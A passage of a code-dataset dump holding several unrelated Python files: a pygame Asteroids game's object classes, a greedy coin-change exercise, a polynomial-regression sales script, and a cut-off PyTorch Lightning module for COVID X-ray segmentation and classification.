direction - direction of asteroid\n image - surface containing picture of asteroid\n gameDisplay - the display to put the asteroid on\n w, h - the width and height of the surface\n \"\"\"\n def __init__(self,x,y,speed,direction,gameDisplay):\n self.x = x\n self.y = y\n self.speed = speed\n self.direction = direction\n self.image = pygame.image.load('Asteroid.png').convert()\n self.image.set_colorkey((0,0,0)) # Sets the Asteroids Blackness to be transparent\n self.w, self.h = self.image.get_size() # Gets the Asteroid's width and height\n self.destroyed = False\n self.gameDisplay = gameDisplay\n def update(self):\n \"\"\"\n updates the position of the asteroid and rectangle\n \"\"\"\n if(not self.destroyed): # once the asteroid is destroyed, it will stop redrawing the asteroid\n width, height = self.gameDisplay.get_size() # gets the display's width and length\n self.x = self.x + (self.speed * cos(self.direction)) # Sets the Asteroid's to a small change in space\n self.y = self.y + (self.speed * sin(self.direction))\n if(self.x >= width): # If the asteroid's coordinate goes outside of the window, set that coordinate to the other side of the map\n self.x = 0 - self.w # adding the width of the image to make sure that the image doesn't appear suddenly (the image's position is the top right of the image)\n elif(self.x <= 0 - self.w): # same as above (makes it so that the whole image has to leave the screen for it to go to the other side)\n self.x = width\n if(self.y >= height):\n self.y = 0 - self.h\n elif(self.y <= 0 - self.h):\n self.y = height\n self.rect = pygame.Rect((self.x + self.shrinkage / 2,self.y + self.shrinkage / 2),(self.w - self.shrinkage,self.h - self.shrinkage)) # The Rect is for the hitbox\n self.gameDisplay.blit(self.image,(self.x,self.y)) # draws the asteroid on the screen\n #pygame.draw.rect(self.gameDisplay,(0,255,0),self.rect) # display's the asteroid's hit box in red (for testing)\nclass LargeAsteroid(Asteroid):\n\n \"\"\"\n subclass of the asteroid, for the starting asteroids\n shrinkage - number that the rectangle hitbox shrinks by\n rect - the hitbox rectangle\n \"\"\"\n def __init__(self,x,y,speed,direction,gameDisplay):\n super().__init__(x,y,speed,direction,gameDisplay)\n self.image = pygame.transform.scale(self.image,(self.w // 2,self.h // 2)) # scales the asteroid to size\n self.w,self.h = self.image.get_size()\n self.shrinkage = 50\n self.rect = pygame.Rect((self.x + self.shrinkage / 2,self.y + self.shrinkage / 2),(self.w - self.shrinkage,self.h - self.shrinkage)) # lessening the hitbox so the corners don't stick out\n self.type = \"Large\"\n def destroy(self):\n \"\"\"\n destroys the asteroid and returns the asteroids that should take it's place.\n \"\"\"\n if(not self.destroyed):\n self.destroyed = True\n MedAster = []\n for i in range(2):\n MedAster.append(MediumAsteroid(self.x,self.y,self.speed*1.5,random.uniform(0,2*pi),self.gameDisplay)) #makes two more medium asteroids in it's place with random directions\n return MedAster\n return []\nclass MediumAsteroid(Asteroid):\n \"\"\"\n subclass of the asteroid, for the second asteroid\n shrinkage - number that the rectangle hitbox shrinks by\n rect - the hitbox rectangle\n \"\"\"\n def __init__(self,x,y,speed,direction,gameDisplay):\n super().__init__(x,y,speed,direction,gameDisplay)\n self.image = pygame.transform.scale(self.image,(self.w // 4,self.h // 4)) # half as big as large asteroid\n self.w,self.h = self.image.get_size()\n self.shrinkage = 25\n self.rect = pygame.Rect((self.x + self.shrinkage / 2,self.y + self.shrinkage / 2),(self.w - self.shrinkage,self.h - self.shrinkage))\n self.type = \"Medium\"\n def destroy(self):\n \"\"\"\n destroys the asteroid and returns the asteroids that should take it's place.\n \"\"\"\n if(not self.destroyed):\n self.destroyed = True\n SmallAster = []\n for i in range(2):\n SmallAster.append(SmallAsteroid(self.x,self.y,self.speed*1.5,random.uniform(0,2*pi),self.gameDisplay)) #makes two more small asteroids in it's place with random directions\n return SmallAster\n return []\nclass SmallAsteroid(Asteroid):\n \"\"\"\n subclass of the asteroid, for the last asteroid\n shrinkage - number that the rectangle hitbox shrinks by\n rect - the hitbox rectangle\n \"\"\"\n def __init__(self,x,y,speed,direction,gameDisplay):\n super().__init__(x,y,speed,direction,gameDisplay)\n self.image = pygame.transform.scale(self.image,(self.w // 8,self.h // 8)) # half as big as medium asteroid\n self.w,self.h = self.image.get_size()\n self.shrinkage = 12\n self.rect = pygame.Rect((self.x + self.shrinkage / 2,self.y + self.shrinkage / 2),(self.w - self.shrinkage,self.h - self.shrinkage))\n self.type = \"Small\"\n def destroy(self):\n \"\"\"\n destroys the asteroid and returns nothing because it is the smallest asteroid\n \"\"\"\n self.destroyed = True\n return []\nclass CollectionOfAsteroids():\n \"\"\"\n A collection of the Asteroids in the game\n listOfAsteroids - a list of the asteroids in the game\n listOfRects - a list of the hitboxes of the asteroids\n gameDisplay - the display\n \"\"\"\n def __init__(self,gameDisplay):\n self.listOfAsteroids = []\n self.gameDisplay = gameDisplay\n self.speed = 1\n def spawnAsteroids(self,numberOfAsteroids):\n \"\"\"\n spawns a set number of asteroids in the sides of the game\n \"\"\"\n width, height = self.gameDisplay.get_size()\n listOfAsteroids = [] # initializes a list of asteroids to update\n listOfRects = [] # initializes a list of hitboxes\n sampleAsteroid = LargeAsteroid(0,0,0,0,self.gameDisplay) # a sample asteroid to know where to spawn the asteroids in case we change the size later\n smallArea = 100 # the area that asteroids are to spawn around the the edge\n for i in range(numberOfAsteroids):\n side = random.randint(1,4)\n if(side == 1): # left side of the screen\n x = random.randint(-sampleAsteroid.w // 2,smallArea - sampleAsteroid.w // 2)\n y = random.randint(-sampleAsteroid.h // 2,height - sampleAsteroid.h // 2)\n elif(side == 2): # top side of the screen\n x = random.randint(-sampleAsteroid.w // 2,width - sampleAsteroid.w // 2)\n y = random.randint(-sampleAsteroid.w // 2,smallArea - sampleAsteroid.w // 2)\n elif(side == 3): # right side of the screen\n x = random.randint(width-smallArea - sampleAsteroid.w // 2,width - sampleAsteroid.w // 2)\n y = random.randint(-sampleAsteroid.w // 2,height - sampleAsteroid.w // 2)\n elif(side == 4): # bottom of the screen\n x = random.randint(-sampleAsteroid.w // 2,width - sampleAsteroid.w // 2)\n y = random.randint(height-smallArea - sampleAsteroid.w // 2,height - sampleAsteroid.w // 2)\n direction = random.uniform(0,pi * 2) # initiate each asteroid with a random direction\n listOfAsteroids.append(LargeAsteroid(x,y,self.speed,direction,self.gameDisplay))\n listOfRects.append(listOfAsteroids[i].rect)\n self.listOfAsteroids = listOfAsteroids\n self.listOfRects = listOfRects\n def update(self):\n \"\"\"\n updates all the asteroids, deleting them from the list if they are destroyed.\n \"\"\"\n listOfRects = [] # asteroid\n ListToDelete = [] # a list that incluedes the indicies of what to delete\n for i in range(len(self.listOfAsteroids)):\n if(self.listOfAsteroids[i].destroyed):\n ListToDelete.append(i) # if the asteroid is destroyed, remember the number to remove it later\n else:\n self.listOfAsteroids[i].update()\n listOfRects.append(self.listOfAsteroids[i].rect)\n for j in reversed(ListToDelete): # reversed so that it doesn't delete one and shift mid for loop.\n del self.listOfAsteroids[j]\n self.listOfRects = listOfRects\n def destroyAll(self):\n \"\"\"\n function for testingasteroid, not for the real game\n \"\"\"\n sizeOfAsteroids = range(len(self.listOfAsteroids))\n for i in sizeOfAsteroids:\n newAsteroid = self.listOfAsteroids[i].destroy()\n if(newAsteroid != None):\n self.listOfAsteroids += newAsteroid # destroying all of the asteroids making them medium\n for i in sizeOfAsteroids:\n self.listOfAsteroids.pop(0)\nclass Projectile():\n \"\"\"\n projectiles that fire and destroy asteroids, ufos and players.\n x - position x\n y - position y\n w, h - size of the projectiles\n speed - speed of the projectile\n direction- direction given to the projectiles\n rect - the hitbox of the projectile\n gameDisplay - the display\n destroyed - senses whether the projectile is destroyed or not\n distanceTravelled - detects how far the projectile has travelled\n \"\"\"\n def __init__(self,x,y,direction,alliance,gameDisplay):\n size = 3\n self.x = x\n self.y = y\n self.w = size\n self.h = size\n self.speed = 10\n self.direction = direction\n self.rect = ((self.x,self.y),(size,size))\n self.image = pygame.Surface((size,size))\n self.image.fill((255,255,255))\n self.gameDisplay = gameDisplay\n width,height = self.gameDisplay.get_size()\n self.destroyed = False\n self.distanceTravelled = 0 # asteroids\n if(alliance == \"Ship\"):\n self.distanceWanted = 5/8 * height # the distance that the projectile travels before it is destroyed\n else:\n self.distanceWanted = 3/8 * height\n self.alliance = alliance\n def update(self):\n \"\"\"\n updates the position of the particle\n \"\"\"\n if(self.distanceTravelled < self.distanceWanted): # if the projectile has travelled farther than the wanted distance, it destroys itself\n width, height = self.gameDisplay.get_size() # gets the display's width and length\n self.x = self.x + (self.speed * cos(self.direction)) # Sets the speed to a small change in space\n self.y = self.y + (self.speed * sin(self.direction))\n self.distanceTravelled += self.speed # updates the disnance travelled\n if(self.x >= width): # If the projectile's coordinate goes outside of the window, set that coordinate to the other side of the map\n self.x = 0 - self.w # adding the width of the image to make sure that the image doesn't appear suddenly (the image's position is the top right of the image)\n elif(self.x <= 0 - self.w): # same as above (makes it so that the whole image has to leave the screen for it to go to the other side)\n self.x = width\n if(self.y >= height):\n self.y = 0 - self.h\n elif(self.y <= 0 - self.h):\n self.y = height\n self.rect = pygame.Rect((self.x,self.y),(self.w,self.h))\n self.gameDisplay.blit(self.image,(self.x,self.y)) # draws the pixel on the screen\n #pygame.draw.rect(self.gameDisplay,(0,255,0),self.rect) # display's the projectile's hit box in green (for testing)\n else:\n self.destroy() # satisfying to right\n def destroy(self):\n self.destroyed = True\nclass CollectionOfProjectiles():\n \"\"\"\n A collection of the Projectiles in the game\n listOfProjectiles - a list of the asteroids in the game\n listOfRects - a list of the hitboxes\n gameDisplay - the display\n \"\"\"\n def __init__(self,gameDisplay):\n self.listOfProjectiles = [] #initializes the asteroidprojectiles\n self.listOfRects = [] # initializes their hitboxes\n self.gameDisplay = gameDisplay\n def addProjectile(self,x,y,direction,alliance):\n \"\"\"\n Adds a projectile to the game at the given x y and direction with an alliance of either \"UFO\" or \"Ship\"\n \"\"\"\n self.listOfProjectiles.append(Projectile(x,y,direction,alliance,self.gameDisplay)) # The spacebar command should call this\n # with the x,y and directions of the ship (with an offset bc of the front of the ship and that the origin is top left)\n def update(self):\n \"\"\"\n Updates all of the projectiles\n \"\"\"\n ListToDelete = [] # initializes the indices of what to delete\n ListOfRects = []\n for i in range(len(self.listOfProjectiles)):\n if(self.listOfProjectiles[i].destroyed):\n ListToDelete.append(i) # adding the index of destroyed particles to delete\n else:\n self.listOfProjectiles[i].update()\n ListOfRects.append(self.listOfProjectiles[i].rect)\n for j in reversed(ListToDelete):\n del self.listOfProjectiles[j]\n self.listOfRects = ListOfRects\nclass UFO():\n \"\"\"\n A class of the general UFO, that moves autonomously and shoots\n (we didn't have enough time to implement a second UFO, so there is only one type of UFO)\n x - x position\n y - y position\n speed - speed of the ufo, constant\n destroyed - whether the UFO is destroyed or not\n image - the UFO image\n w,h - the height and width of the image\n FacingRight - the direction the UFO is facing(UFO goes either right to left or left to right)(also determines x position)\n counter - for recording the refractory period of the shooting\n listOfProjectiles - to allow it to call the add projectile function\n straight - whether the UFO goes straight across the screen or down then up\n \"\"\"\n def __init__(self,y,FacingRight,gameDisplay,listOfProjectiles):\n self.y = y\n self.speed = 2\n self.destroyed = False\n self.image = pygame.image.load('UFO.gif').convert()\n self.image.set_colorkey((0,0,0))\n self.w, self.h = self.image.get_size()\n self.straight = bool(random.getrandbits(1))\n self.FacingRight = FacingRight\n self.gameDisplay = gameDisplay\n width, height = gameDisplay.get_size()\n self.counter = 0\n self.listOfProjectiles = listOfProjectiles\n if(FacingRight):\n self.x = -self.w\n else:\n self.x = width\n def update(self):\n \"\"\"\n updates the position of the UFO, as well as deciding when to shoot\n \"\"\"\n if(self.counter % self.fireRate == 0):\n self.shoot()\n self.counter += 1\n width, height = self.gameDisplay.get_size()\n if(self.straight == True): # sometimes it goes straight accross, sometimes down then up\n if(self.FacingRight):\n self.direction = 0\n else:\n self.direction = pi\n else:\n if(self.FacingRight): # algorithm for going down then up\n if((self.x + self.w / 2) < width * 1 / 4):\n self.direction = 0\n elif(self.x + self.w / 2 < width / 2):\n self.direction = pi / 4\n else:\n self.direction = - pi / 4\n else:\n if((self.x + self.w / 2) > width * 3 / 4):\n self.direction = pi\n elif(self.x + self.w / 2 > width / 2):\n self.direction = 5 * pi / 4\n else:\n self.direction = 3 * pi / 4\n self.x = self.x + (self.speed * cos(self.direction)) # Sets the speed to a small change in space\n self.y = self.y + (self.speed * sin(self.direction))\n if(self.x >= width and self.FacingRight): # if the UFO goes out of the screen, destroy it\n self.destroyed = True\n elif(self.x <= 0 - self.w and not self.FacingRight):\n self.destroyed = True\n if(self.y >= height): # If the UFOs coordinate goes outside of the window, set that coordinate to the other side of the map\n self.y = 0 - self.h # adding the width of the image to make sure that the image doesn't appear suddenly (the image's position is the top right of the image)\n elif(self.y <= 0 - self.h): # same as above (makes it so that the whole image has to leave the screen for it to go to the other side)\n self.y = height\n self.rect = pygame.Rect((self.x + self.shrinkage / 2,self.y + self.shrinkage / 2),(self.w - self.shrinkage,self.h - self.shrinkage))\n #pygame.draw.rect(self.gameDisplay,(0,0,255),self.rect) # display's the UFO's hit box in blue (for testing)\n self.gameDisplay.blit(self.image,(self.x,self.y))\n def destroy(self):\n \"\"\"\n destroys the UFO\n \"\"\"\n self.destroyed = True\nclass BigUFO(UFO):\n \"\"\"\n A subclass of UFO that shoots in a random direction and moves either straight or down then up\n shrinkage - how much to shrink the UFO image\n fireRate - cooldown for how often the UFO fires\n \"\"\"\n def __init__(self,y,FacingRight,gameDisplay,listOfProjectiles):\n super().__init__(y,FacingRight,gameDisplay,listOfProjectiles)\n self.image = pygame.transform.scale(self.image,(self.w // 2,self.h // 2))\n self.w,self.h = self.image.get_size()\n self.shrinkage = 30\n self.rect = pygame.Rect((self.x + self.shrinkage / 2,self.y + self.shrinkage / 2),(self.w - self.shrinkage,self.h - self.shrinkage))\n self.fireRate = 60\n def shoot(self):\n \"\"\"\n shoots a projectile\n \"\"\"\n if(not self.destroyed):\n self.listOfProjectiles.addProjectile(self.x + self.w / 2,self.y + self.h / 2,random.uniform(0,2*pi),\"UFO\")\nclass CollectionOfUFOs():\n \"\"\"\n A collection of the UFOs on the screen(there can only be one UFO, but this allows for an opportunity to add more if the game is too easy)\n listOfUFOs - the list of the UFOs on screen\n listOfRects - the list of the hitboxes of UFOs\n gameDisplay - display\n listOfProjectiles - the list of projectiles on screen so UFOs can shoot\n \"\"\"\n def __init__(self,gameDisplay,listOfProjectiles):\n self.listOfUFOs = [] #initializes the projectiles\n self.listOfRects = [] # initializes their hitboxes\n self.gameDisplay = gameDisplay\n self.listOfProjectiles = listOfProjectiles\n def spawnBigUFO(self):\n \"\"\"\n Spawns a big UFO in the game (would have been complemented by a spawnSmallUFO if time alloted)\n \"\"\"\n width, height = self.gameDisplay.get_size()\n sampleUFO = BigUFO(0,True,self.gameDisplay,self.listOfProjectiles)\n y = random.randint(-sampleUFO.h // 2,height - sampleUFO.h // 2)\n facingRight = bool(random.getrandbits(1))\n self.listOfUFOs.append(BigUFO(y,facingRight,self.gameDisplay,self.listOfProjectiles))\n def update(self):\n \"\"\"\n updates the list of UFOs\n \"\"\"\n listOfRects = []\n ListToDelete = [] # initializes the indices of what to delete\n for i in range(len(self.listOfUFOs)):\n if(self.listOfUFOs[i].destroyed):\n ListToDelete.append(i) # adding the index of destroyed particles to delete\n else:\n self.listOfUFOs[i].update()\n listOfRects.append(self.listOfUFOs[i].rect)\n for j in reversed(ListToDelete):\n del self.listOfUFOs[j]\n self.listOfRects = listOfRects\nclass listOfObjects():\n \"\"\"\n List of all objects in the game:\n gameDisplay - display\n Asteroids - the collection of Asteroids\n Projectiles - the collection of Projectiles\n UFOs - the collection of UFOs\n ship - the ship in the game\n \"\"\"\n def __init__(self,gameDisplay, ship):\n self.gameDisplay = gameDisplay\n self.Asteroids = CollectionOfAsteroids(gameDisplay)\n self.Projectiles = CollectionOfProjectiles(gameDisplay) # contains the CollectionOfAsteroids and CollectionOfProjectiles objects\n self.UFOs = CollectionOfUFOs(gameDisplay,self.Projectiles)\n self.ship = ship\n def update(self):\n \"\"\"\n updates all objects and handles any collinion detection between objects\n \"\"\"\n self.Asteroids.update()\n self.UFOs.update()\n self.Projectiles.update()\n collisionsAster = self.ship.rect.collidelist(self.Asteroids.listOfRects) # detects if any of the asteroids are in contact with the projectile\n if (collisionsAster != -1 and self.ship.destroyed == False): # if there is a collision\n self.Asteroids.listOfAsteroids += self.Asteroids.listOfAsteroids[collisionsAster].destroy() #destroy both the asteroid and the projectile.\n self.ship.destroy()\n collisionsUFO = self.ship.rect.collidelist(self.UFOs.listOfRects)\n if (collisionsUFO != -1 and self.ship.destroyed == False): # if there is a collision\n #self.UFOs.listOfUFOs[collisionsUFO].destroy() #destroy both the asteroid and the projectile.\n self.ship.destroy()\n collisionsProj = self.ship.rect.collidelist(self.Projectiles.listOfRects)\n if (collisionsProj != -1 and self.Projectiles.listOfProjectiles[collisionsProj].alliance != \"Ship\" and self.ship.destroyed == False):\n self.Projectiles.listOfProjectiles[collisionsProj].destroy()\n self.ship.destroy()\n for i in self.Projectiles.listOfProjectiles: # runs through each projectile\n collisionsAster = i.rect.collidelist(self.Asteroids.listOfRects) # detects if any of the asteroids are in contact with the projectile\n if (collisionsAster != -1): # if there is a collision\n if(i.alliance == \"Ship\"):\n if(self.Asteroids.listOfAsteroids[collisionsAster].type == \"Large\"):\n self.ship.score += 20\n elif(self.Asteroids.listOfAsteroids[collisionsAster].type == \"Medium\"):\n self.ship.score += 50\n elif(self.Asteroids.listOfAsteroids[collisionsAster].type == \"Small\"):\n self.ship.score += 100\n self.Asteroids.listOfAsteroids += self.Asteroids.listOfAsteroids[collisionsAster].destroy() #destroy both the asteroid and the projectile.\n i.destroy()\n collisionsUFO = i.rect.collidelist(self.UFOs.listOfRects)\n if (collisionsUFO != -1 and i.alliance != \"UFO\"): # if there is a collision\n self.UFOs.listOfUFOs[collisionsUFO].destroy() #destroy both the asteroid and the projectile.\n i.destroy()\n self.ship.score += 500\n for i in self.UFOs.listOfUFOs:\n collisionsAster = i.rect.collidelist(self.Asteroids.listOfRects) # detects if any of the asteroids are in contact with the projectile\n if (collisionsAster != -1): # if there is a collision\n self.Asteroids.listOfAsteroids += self.Asteroids.listOfAsteroids[collisionsAster].destroy() #destroy both the asteroid and the projectile.\n i.destroy()\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":29010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"642487220","text":"money_type = [500, 100, 50, 10]\nchanges = 1260\ncount = 0\n\nfor coin in money_type:\n result = changes // coin\n count += result\n changes -= coin * result\n\nprint(count)\n\n\n\n'''\n# 교재 해설\nn = 1260\ncount = 0\n\n# 큰 단위의 화폐부터 차례대로 확인\ncoin_type = [500, 100, 50, 10]\n\nfor coin in coin_type:\n count += n // coin # 해당 화폐로 거슬러 줄 수 있는 동전의 개수 세기\n n %= coin\n\nprint(coin)\n'''\n","sub_path":"Greedy/거스름돈.py","file_name":"거스름돈.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"436365628","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndataset = pd.read_csv('Datasetwithservices-Sheet1.csv')\n\ntemp = dataset.iloc[:, :].values\n\n\nlaptop_count=[]\nyear=[]\nfor i in range(2009,2019):\n year.append(i)\n\n\ntempc=0\nfor j in range(0,len(year)):\n for i in range(0,len(temp)):\n if temp[i][3]=='Laptop' and temp[i][8]=='USA':\n if temp[i][4] == year[j]:\n tempc=tempc+1 \n laptop_count.append(tempc)\n tempc=0 \n \nt1=[]\ny=[]\nfor j in range(0,len(year)):\n t=year[j]\n t1.append(t)\n y.append(t1)\n t1=[]\nX=y\ny=laptop_count\nfrom sklearn.linear_model import LinearRegression\nlin_reg = LinearRegression()\nlin_reg.fit(X,y)\nfrom sklearn.preprocessing import PolynomialFeatures\npoly_reg = PolynomialFeatures(degree = 4)\nX_poly = poly_reg.fit_transform(X)\npoly_reg.fit(X_poly, y)\nlin_reg_2 = LinearRegression()\nlin_reg_2.fit(X_poly, y)\n\n# Visualising the Polynomial Regression results\nplt.scatter(X, y, color = 'red')\nplt.plot(X, lin_reg_2.predict(poly_reg.fit_transform(X)), color = 'blue')\nplt.title('Truth or Bluff (Polynomial Regression)')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.show()\n\n# Visualising the Polynomial Regression results (for higher resolution and smoother curve)\nX_grid = np.arange(min(year), max(year), 0.1)\nX_grid = X_grid.reshape((len(X_grid), 1))\nplt.scatter(X, y, color = 'red')\nplt.plot(X_grid, lin_reg_2.predict(poly_reg.fit_transform(X_grid)), color = 'blue')\nplt.title('Truth or Bluff (Polynomial Regression)')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.show()\n\n# Predicting a new result with Polynomial Regression\nlin_reg_2.predict(poly_reg.fit_transform(2019))\n\n","sub_path":"polyregregional.py","file_name":"polyregregional.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"123664631","text":"\nfrom torch.utils.data import DataLoader\nfrom segmentation_models_pytorch.losses import LovaszLoss, DiceLoss, FocalLoss\n\nimport os\nimport torch\nimport torchmetrics\n\nimport pandas as pd\nimport torchvision.transforms as T\nimport torch.nn.functional as F\nimport pytorch_lightning as pl\n\nfrom model.unet_smp_mask_cond import SMPModelMaskCond\nfrom dataset import COVIDDataset, VinBigDataset\nfrom utils.etc import collate_fn, split_df, get_image_size_from_decoder_blocks, get_lr_scheduler\nfrom utils.augmentation import get_study_transform\n\nclass LitUnetSmpMaskCond(pl.LightningModule):\n def __init__(self, config, learning_rate=None):\n super().__init__()\n self.config = config\n if learning_rate:\n self.learning_rate = learning_rate\n else:\n self.learning_rate = config.lr\n self.num_classes = 4\n\n self.model = SMPModelMaskCond(self.config.unet_smp)\n\n self.train_map = torchmetrics.BinnedAveragePrecision(num_classes=4)\n self.val_map = torchmetrics.BinnedAveragePrecision(num_classes=4)\n self.test_map = torchmetrics.BinnedAveragePrecision(num_classes=4)\n\n self.mask_img_size = get_image_size_from_decoder_blocks(config.unet_smp.decoder_blocks, config.img_size)\n\n self.lovasz_loss = LovaszLoss(mode=\"multilabel\")\n self.dice_loss = DiceLoss(mode=\"multilabel\")\n self.focal_loss = FocalLoss(mode=\"multilabel\")\n\n def setup(self, stage):\n if \"vin\" in self.config.data_root:\n train_df = pd.read_csv(os.path.join(self.config.data_root, \"train.csv\"))\n train_df, val_df = split_df(train_df, 8888, 0, cv=\"kf\")\n train_transform, val_transform = get_study_transform(self.config.img_size)\n self.train_set = VinBigDataset(root=self.config.data_root, mask=self.config.mask_type, img_size=self.config.img_size, df=train_df, transform=train_transform, mask_img_size=self.mask_img_size)\n self.test_set = VinBigDataset(root=self.config.data_root, mask=self.config.mask_type, img_size=self.config.img_size, df=val_df, transform=val_transform, mask_img_size=self.mask_img_size)\n else:\n if self.config.no_ricord_val:\n assert self.config.dataset_postfix == \"-merge\" or self.config.dataset_postfix == \"-pseudo\" or self.config.dataset_postfix == \"-pseudo2\"\n train_df = pd.read_csv(os.path.join(self.config.data_root, \"train_psl_none.csv\"))\n ricord_df = train_df[train_df[\"merge\"] == True]\n train_df = train_df[train_df[\"merge\"] == False]\n\n if self.config.second_train:\n _, val_df = split_df(train_df, self.config.seed, self.config.fold, self.config.cv)\n else:\n train_df, val_df = split_df(train_df, self.config.seed, self.config.fold, self.config.cv)\n\n train_df = pd.concat((train_df, ricord_df))\n else:\n train_df = pd.read_csv(os.path.join(self.config.data_root, \"train_psl_none.csv\"))\n\n if self.config.second_train:\n _, val_df = split_df(train_df, self.config.seed, self.config.fold, self.config.cv)\n else:\n train_df, val_df = split_df(train_df, self.config.seed, self.config.fold, self.config.cv)\n\n\n if self.config.album:\n train_transform, val_transform = get_study_transform(self.config.img_size)\n self.train_set = COVIDDataset(root=self.config.data_root, mask=self.config.mask_type, img_size=self.config.img_size, df=train_df, transform=train_transform, mask_img_size=self.mask_img_size)\n self.test_set = COVIDDataset(root=self.config.data_root, mask=self.config.mask_type, img_size=self.config.img_size, df=val_df, transform=val_transform, mask_img_size=self.mask_img_size)\n else:\n transform = T.Compose([\n T.Resize(self.config.img_size),\n T.ToTensor(),\n T.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n self.train_set = COVIDDataset(root=self.config.data_root, mask=self.config.mask_type, img_size=self.config.img_size, df=train_df, transform=transform, mask_img_size=self.mask_img_size)\n self.test_set = COVIDDataset(root=self.config.data_root, mask=self.config.mask_type, img_size=self.config.img_size, df=val_df, transform=transform, mask_img_size=self.mask_img_size)\n\n def training_step(self, batch, _):\n inputs, targets, masks = self.get_batch(batch, mask=self.config.mask_type)\n\n loss = None\n losses_to_use = self.config.losses.split(\",\")\n\n inputs = torch.stack(inputs)\n\n stage = \"train\"\n\n if \"seg\" in losses_to_use:\n masks = torch.stack(masks)\n\n outputs_masks = self.model.forward_mask(inputs)\n loss_seg = self.calc_seg_loss(outputs_masks, masks)\n\n self.log(f\"{stage}_loss_seg\", loss_seg, on_step=False, on_epoch=True, sync_dist=True)\n if loss is None:\n loss = loss_seg\n else:\n loss += loss_seg\n\n if \"cls\" in losses_to_use:\n outputs = self.model(inputs, outputs_masks)\n loss_cls = F.cross_entropy(outputs, targets)\n self.log(f\"{stage}_loss_cls\", loss_cls, on_step=False, on_epoch=True, sync_dist=True)\n if loss is None:\n loss = loss_cls\n else:\n loss += loss_cls\n\n ap = self.train_map(torch.softmax(outputs, dim=1), targets)\n mean_ap = sum(ap) / len(ap)\n\n self.log(f\"{stage}_mAP\", mean_ap, on_step=False, on_epoch=True, sync_dist=True)\n\n loss = loss / len(losses_to_use)\n\n self.log(f\"{stage}_loss\", loss, on_step=False, on_epoch=True, sync_dist=True)\n\n return loss\n\n def training_epoch_end(self, outs):\n ap = self.train_map.compute()\n mean_ap = sum(ap) / len(ap)\n self.log(\"train_mAP_epoch\", mean_ap, on_step=False, on_epoch=True, prog_bar=True, logger=True, sync_dist=True)\n\n\n def validation_step(self, batch, batch_idx):\n inputs, targets, masks = self.get_batch(batch, mask=self.config.mask_type)\n\n loss = None\n losses_to_use = self.config.losses.split(\",\")\n\n inputs = torch.stack(inputs)\n\n stage = \"val\"\n\n if \"seg\" in losses_to_use:\n masks = torch.stack(masks)\n\n outputs_masks = self.model.forward_mask(inputs)\n loss_seg = self.calc_seg_loss(outputs_masks, masks)\n\n self.log(f\"{stage}_loss_seg\", loss_seg, on_step=False, on_epoch=True, sync_dist=True)\n if loss is None:\n loss = loss_seg\n else:\n loss += loss_seg\n\n if \"cls\" in losses_to_use:\n outputs = self.model(inputs, outputs_masks)\n loss_cls = F.cross_entropy(outputs, targets)\n self.log(f\"{stage}_loss_cls\", loss_cls, on_step=False, on_epoch=True, sync_dist=True)\n if loss is None:\n loss = loss_cls\n else:\n loss += loss_cls\n\n ap = self.val_map(torch.softmax(outputs, dim=1), targets)\n mean_ap = sum(ap) / len(ap)\n\n self.log(f\"{stage}_mAP\", mean_ap, on_step=False, on_epoch=True, sync_dist=True)\n\n\n loss = loss / len(losses_to_use)\n\n self.log(f\"{stage}_loss\", loss, on_step=False, on_epoch=True, sync_dist=True)\n\n return loss\n\n def validation_epoch_end(self, outs):\n ap = self.val_map.compute()\n mean_ap = sum(ap) / len(ap)\n self.log(\"val_mAP_epoch\", mean_ap, on_step=False, on_epoch=True, prog_bar=True, logger=True, sync_dist=True)\n\n def test_step(self, batch, batch_idx):\n inputs, targets, masks = self.get_batch(batch, mask=self.config.mask_type)\n\n loss = None\n losses_to_use = self.config.losses.split(\",\")\n\n inputs = torch.stack(inputs)\n\n stage = \"test\"\n\n if \"seg\" in losses_to_use:\n masks = torch.stack(masks)\n\n outputs_masks = self.model.forward_mask(inputs)\n loss_seg = self.calc_seg_loss(outputs_masks, masks)\n\n self.log(f\"{stage}_loss_seg\", loss_seg, on_step=False, on_epoch=True, sync_dist=True)\n if loss is None:\n loss = loss_seg\n else:\n loss += loss_seg\n\n if \"cls\" in losses_to_use:\n outputs = self.model(inputs, outputs_masks)\n loss_cls = F.cross_entropy(outputs, targets)\n self.log(f\"{stage}_loss_cls\", loss_cls, on_step=False, on_epoch=True, sync_dist=True)\n if loss is None:\n loss = loss_cls\n else:\n loss += loss_cls\n\n ap = self.test_map(torch.softmax(outputs, dim=1), targets)\n mean_ap = sum(ap) / len(ap)\n\n self.log(f\"{stage}_mAP\", mean_ap, on_step=False, on_epoch=True, sync_dist=True)\n\n\n loss = loss / len(losses_to_use)\n\n self.log(f\"{stage}_loss\", loss, on_step=False, on_epoch=True, sync_dist=True)\n\n return loss\n\n def test_epoch_end(self, outs):\n ap = self.test_map.compute()\n mean_ap = sum(ap) / len(ap)\n self.log(\"test_mAP_epoch\", mean_ap, on_step=False, on_epoch=True, prog_bar=True, logger=True, sync_dist=True)\n\n def configure_optimizers(self):\n model_params = [\n {\"params\": self.model.seg.encoder.parameters(), \"lr\": self.learning_rate * self.config.w_enc},\n {\"params\": list(self.model.seg.decoder.parameters())+list(self.model.seg.segmentation_head.parameters()), \"lr\": self.learning_rate * self.config.w_seg},\n {\"params\": list(self.model.neck.parameters())+list(self.model.head.parameters()), \"lr\": self.learning_rate * self.config.w_cls},\n ]\n if self.config.optimizer == \"sgd\":\n optimizer = torch.optim.SGD(\n model_params,\n lr=self.learning_rate,\n momentum=self.config.momentum,\n weight_decay=1e-5,\n # nesterov=True,\n )\n elif self.config.optimizer == \"adam\":\n optimizer = torch.optim.Adam(\n model_params,\n lr=self.learning_rate,\n )\n elif self.config.optimizer == \"adamw\":\n optimizer = torch.optim.AdamW(\n model_params,\n lr=self.learning_rate,\n )\n\n if self.config.lr_schedule.name:\n lr_scheduler = get_lr_scheduler(self.config.lr_schedule, optimizer)\n\n return 